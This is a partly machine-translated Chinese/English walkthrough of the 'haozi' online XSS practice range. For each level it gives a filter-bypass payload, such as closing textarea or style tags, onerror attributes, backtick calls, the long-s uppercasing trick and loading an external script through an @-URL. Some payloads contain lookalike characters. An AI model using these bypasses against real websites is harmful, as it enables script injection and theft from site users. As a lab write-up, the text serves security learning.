当前位置：网站首页>XSS online shooting range---haozi

This level is to put our input data into<textarea>标签里面了,但是<textarea>It cannot be executed in the labelJS代码,In addition, there are no other restrictions on symbols, etc,So let's close first<textarea>标签,在写入JS代码

</textarea><script>alert(1)</script>

PS:HTMLThe label has an automatic error correction function,So whether to add it or not<textarea>This code can be executed by closing the following tags

0x02

This level is to transmit our input data tovalue中,So we need to close the double quotes first,再执行JS代码

aa" οnclick="alert(1)

0x03

这一关对（、）、[ 、] 进行了限制,At this time, we can consider using backticks instead of parentheses to executeJS代码,在执行的JSThe code needs to be correct beforevalueDo double-quote closures

aa" <script>alert`1`</script>

0x04

这一关对（、）、[ 、] 、` 进行了限制,We can't try to get around it by encoding the parentheses after the backticks

aa" <img src=1 οnerrοr=alert(1)

0x05

This level will put the input into the comment,And the input comment characters are filtered,使用jsThe second annotation in ：--!>

aa" --!> <img src=1 οnerrοr=alert(1) It can be bypassed without encoding

0x06

过滤了js中的点击事件,Execute the function after wrapping it on a new line

aa" type="image" src=1 onerror 需要换行
=alert(1)

0x07

过滤了JS中的script等标签,Special symbols like angle brackets are also filtered,htmlThe language is looser-->Incorrect syntax will be completed,Try without the closing tag,不行,Not a pair of angle brackets,所以我们使用<img标签

<img src=1 οnerrοr=alert(1) A newline is required at the end

0x08

The entered content is put in<stype>标签中,<stype>标签中的内容不执行JS,Closure is achieved with a newline<stype>,Newlines also bypass regular expressions

</style Be sure to wrap the line when the label is not closed
><img src=1 οnerrοr=alert(1)

0x09

Regular expressions restrict what must be preceded by http开头,The front label can be closed,Bypass in the middle,并使用//注释后面的内容.

http://www.segmentfault.com"></script><script>alert(1)//

0x0A

URL格式：@The previous website can be redirected to the following website.所以我们可以先创建一个JS脚本,Then redirect the site to what we wrote ourselvesJS脚本

http://[email protected]/test.js

0x0B

toUpperCase() 方法用于把字符串转换为大写. This question converts our input to uppercase,

利用 <img src=1 οnerrοr=实体编码> 或 <svg/οnlοad=实体编码> 实现绕过

0x0C

Uppercase and lowercase the entered data,且过滤script,可以使用<svg/οnlοad=实体编码绕过> 或<details open οntοggle=实体编码>绕过

0x0D

This level is filtered/[</"']符号,And put the input into the comment,We need to escape the comment with a newline first,After writing the popup function, you need to wrap the line and comment out the following symbols.

#换了一行
alert(1)
--> #Comment out the following single quotes and parentheses

0x0E

This level restricts letters starting with angle brackets and capitalizes letters,In this case we can use a special symbol ſ --> Uppercase characters are converted to S,实现绕过

<ſvg/οnlοad=alert(1)>

<ſcript src="http://127.0.0.1/test.js"></ſcript> #We do this by introducing our ownJS文件实现绕过

0x0F

This level escapes many symbols,But it can be directly identified,So such encoding restrictions don't have much effect,We only need to comment out the following characters in the previous closed pop-up window.

bbb');alert(1)//